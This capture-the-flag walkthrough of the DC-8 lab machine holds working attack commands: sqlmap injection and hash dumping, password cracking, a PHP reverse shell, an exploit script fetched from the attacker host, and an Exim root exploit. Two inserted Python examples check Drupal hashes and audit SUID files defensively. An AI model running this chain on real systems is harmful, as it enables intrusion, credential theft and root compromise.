
DCchallenges8

Information gathering

Environment

Subnet: 192.168.18.0/24

Kali: 192.168.18.131

Target: 192.168.18.141

Scan the subnet

kali@kali2020:~$ sudo nmap 192.168.18.0/24 -sn
[sudo] kali 的密码:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-08 21:27 CST
Nmap scan report for 192.168.18.2
Host is up (0.00035s latency).
MAC Address: 00:50:56:E0:DA:9A (VMware)
Nmap scan report for 192.168.18.141
Host is up (0.00063s latency).
MAC Address: 00:0C:29:F3:39:D5 (VMware)
Nmap scan report for 192.168.18.254
Host is up (0.00032s latency).
MAC Address: 00:50:56:FD:0E:3D (VMware)
Nmap scan report for 192.168.18.131
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.53 seconds

Scan the target

kali@kali2020:~$ sudo nmap 192.168.18.141 -p- -sV
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-08 21:30 CST
Nmap scan report for 192.168.18.141
Host is up (0.0015s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
80/tcp open  http    Apache httpd
MAC Address: 00:0C:29:F3:39:D5 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.93 seconds

Directory scan with dirsearch

sudo python3 dirsearch -u 192.168.18.141

It found nothing of interest; switching to dirb turned up

http://192.168.18.141/user

SQL injection

Open the home page and click one of the links under Details on the left: the URL carries a nid parameter. Check whether it is injectable.

Run it through sqlmap

sqlmap -u http://192.168.18.141/?nid=3 --batch

sqlmap -u http://192.168.18.141/?nid=3 --batch --dbs

available databases [2]:
[*] d7db
[*] information_schema

sqlmap -u http://192.168.18.141/?nid=3 --batch -D d7db --tables

Database: d7db
[88 tables]
filter, system, actions, authmap, batch, block, block_custom, block_node_type, block_role, blocked_ips,
cache, cache_block, cache_bootstrap, cache_field, cache_filter, cache_form, cache_image, cache_menu, cache_page, cache_path,
cache_views, cache_views_data, ckeditor_input_format, ckeditor_settings, ctools_css_cache, ctools_object_cache,
date_format_locale, date_format_type, date_formats, field_config, field_config_instance, field_data_body,
field_data_field_image, field_data_field_tags, field_revision_body, field_revision_field_image, field_revision_field_tags,
file_managed, file_usage, filter_format, flood, history, image_effects, image_styles, menu_custom, menu_links, menu_router,
node, node_access, node_revision, node_type, queue, rdf_mapping, registry, registry_file, role, role_permission,
search_dataset, search_index, search_node_links, search_total, semaphore, sequences, sessions, shortcut_set,
shortcut_set_users, site_messages_table, taxonomy_index, taxonomy_term_data, taxonomy_term_hierarchy, taxonomy_vocabulary,
url_alias, users, users_roles, variable, views_display, views_view, watchdog, webform, webform_component,
webform_conditional, webform_conditional_actions, webform_conditional_rules, webform_emails, webform_last_download,
webform_roles, webform_submissions, webform_submitted_data

sqlmap -u http://192.168.18.141/?nid=3 --batch -D d7db -T users --columns

Database: d7db
Table: users
[16 columns]
+------------------+------------------+
| Column           | Type             |
+------------------+------------------+
| language         | varchar(12)      |
| access           | int(11)          |
| created          | int(11)          |
| data             | longblob         |
| init             | varchar(254)     |
| login            | int(11)          |
| mail             | varchar(254)     |
| name             | varchar(60)      |
| pass             | varchar(128)     |
| picture          | int(11)          |
| signature        | varchar(255)     |
| signature_format | varchar(255)     |
| status           | tinyint(4)       |
| theme            | varchar(255)     |
| timezone         | varchar(32)      |
| uid              | int(10) unsigned |
+------------------+------------------+


sqlmap -u http://192.168.18.141/?nid=3 --batch -D d7db -T users -C name,pass --dump

Database: d7db
Table: users
[2 entries]
+-------+---------------------------------------------------------+
| name  | pass                                                    |
+-------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john  | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-------+---------------------------------------------------------+

The dump returns two rows, but the passwords are stored as hashes. Taking the username john as a hint, crack them with John the Ripper.


John the Ripper did not recover admin's password.

john's password is turtle.
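To see what the cracker was working against, here is an added example (not from the original post) that re-implements Drupal 7's $S$ password check in Python: a cost character, an 8-character salt, 2^cost rounds of SHA-512, then phpass-style base64, truncated to 55 characters. It verifies the two hashes dumped above; cost 'D' means 32768 rounds per guess, so every candidate is expensive and a password outside the wordlist, like admin's, stays uncracked.

```python
import hashlib

# Drupal 7 "$S$" hash layout: "$S$" + cost char + 8-char salt + 43 chars of
# phpass-style base64 over iterated SHA-512 (stored form is cut to 55 chars).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# The two hashes dumped from d7db.users in the writeup above.
ADMIN_HASH = "$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z"
JOHN_HASH = "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF"

def phpass_b64(data: bytes) -> str:
    """phpass/Drupal base64: 3 little-endian bytes -> 4 chars, no padding."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def parse_setting(stored: str):
    # Returns (count_log2, salt); rejects anything that is not a $S$ hash.
    if len(stored) != 55 or not stored.startswith("$S$"):
        raise ValueError("not a Drupal 7 SHA-512 password hash")
    count_log2 = ITOA64.index(stored[3])
    if not 7 <= count_log2 <= 30:  # Drupal's DRUPAL_MIN/MAX_HASH_COUNT
        raise ValueError("iteration cost out of range")
    return count_log2, stored[4:12]

def drupal7_hash(password: str, stored: str) -> str:
    # Recompute the stored hash for a candidate password.
    count_log2, salt = parse_setting(stored)
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):  # cost 'D' -> 2**15 = 32768 rounds
        digest = hashlib.sha512(digest + pw).digest()
    return (stored[:12] + phpass_b64(digest))[:55]

def check_password(password: str, stored: str) -> bool:
    return drupal7_hash(password, stored) == stored
```

Legacy "U$" and "$P$"/"$H$" MD5 variants that Drupal 7 also accepts are not handled here.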

Logging in at http://192.168.18.141/user/ succeeds.

Open Content and have a look.


Reverse shell

The Contact Us page is editable.

Change its format to PHP.

Upgrade the reverse shell to an interactive one

python -c 'import pty;pty.spawn("/bin/bash")'

Privilege escalation

List the SUID files, i.e. programs that run with their owner's (usually root's) privileges:

find / -perm -u=s -type f 2>/dev/null

Try exim4.

Check the exim4 version

exim4 --version

Exim version 4.89

searchsploit exim 4

Look for an exploit, choose 46996.sh, copy it to the working directory and start an HTTP server on Kali.

cp /usr/share/exploitdb/exploits/linux/local/46996.sh dc8.sh

python2 -m SimpleHTTPServer

On the target, change to /tmp first, then download the script from Kali.

wget http://192.168.18.131:8000/dc8.sh

Note: the exploit will not run as downloaded; strip the carriage returns from the line endings first: sed -i -e 's/\r$//' dc8.sh

www-data@dc-8:/tmp$ ls
ls
getShell.sh
www-data@dc-8:/tmp$ chmod 777 dc8.sh
chmod 777 dc8.sh
www-data@dc-8:/tmp$ ./dc8.sh

Read the usage notes in the script header

# Usage (setuid method):

# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
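The same `find / -perm -u=s` enumeration used above is also the defender's check: the setuid method in this script header leaves a root-owned SUID helper at /tmp/pwned. Below is an added example (not from the post or the exploit) that walks a tree, reports SUID regular files that are missing from a baseline or sit in a world-writable scratch directory, and builds a constructed sample tree to exercise itself; the baseline and scratch-directory list are assumptions for the host being audited.

```python
import os
import stat
import tempfile

# Directories where a legitimate SUID binary has no business living; an
# escalation helper like /tmp/pwned lands exactly here.
WORLD_WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

def suid_files(root):
    """Sorted paths of regular files under root that carry the setuid bit."""
    found = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue  # vanished or unreadable entry, skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)

def audit_suid(root, baseline, scratch_dirs=WORLD_WRITABLE_DIRS):
    """Findings as (path, reason, owner_uid) for SUID files that are either
    inside a scratch directory or absent from the baseline. Build the baseline
    once on a known-good image (find / -perm -u=s -type f) and keep it off-host."""
    expected = set(baseline)
    findings = []
    for path in suid_files(root):
        uid = os.lstat(path).st_uid
        if any(path.startswith(d.rstrip("/") + "/") for d in scratch_dirs):
            findings.append((path, "suid in world-writable dir", uid))
        elif path not in expected:
            findings.append((path, "not in baseline", uid))
    return findings

def demo():
    """Constructed sample tree: one baselined SUID file, one rogue one in tmp/."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "tmp"))
    ok = os.path.join(root, "passwd")        # expected, listed in the baseline
    rogue = os.path.join(root, "tmp", "pwned")  # unexpected, in a scratch dir
    for p in (ok, rogue):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, 0o4755)  # rwsr-xr-x
    findings = audit_suid(root, [ok], scratch_dirs=[os.path.join(root, "tmp")])
    return [(os.path.relpath(p, root), why) for p, why, _ in findings]
```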



Reference

https://www.freebuf.com/articles/web/261074.html

https://my.oschina.net/u/3896378/blog/4427624
